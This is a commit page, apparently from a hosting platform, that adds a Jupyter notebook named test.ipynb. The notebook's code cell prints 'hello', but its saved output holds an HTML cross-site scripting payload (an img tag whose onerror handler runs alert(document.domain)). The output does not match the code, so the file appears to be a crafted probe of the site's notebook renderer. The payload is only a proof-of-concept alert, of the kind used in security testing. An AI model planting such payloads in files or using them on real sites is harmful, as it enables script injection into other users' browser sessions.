FIRSTACCOUNT69 commited on
Commit
481f35d
·
verified ·
1 Parent(s): 77b13f0

upload notebook

Browse files
Files changed (1) hide show
  1. test.ipynb +19 -0
test.ipynb ADDED
@@ -0,0 +1,19 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "cells": [
3
+ {
4
+ "cell_type": "code",
5
+ "outputs": [
6
+ {
7
+ "output_type": "display_data",
8
+ "data": {
9
+ "text/html": "<img src=x onerror=alert(document.domain)>"
10
+ }
11
+ }
12
+ ],
13
+ "source": ["print('hello')"]
14
+ }
15
+ ],
16
+ "metadata": {"kernelspec": {"display_name": "Python 3"}},
17
+ "nbformat": 4,
18
+ "nbformat_minor": 5
19
+ }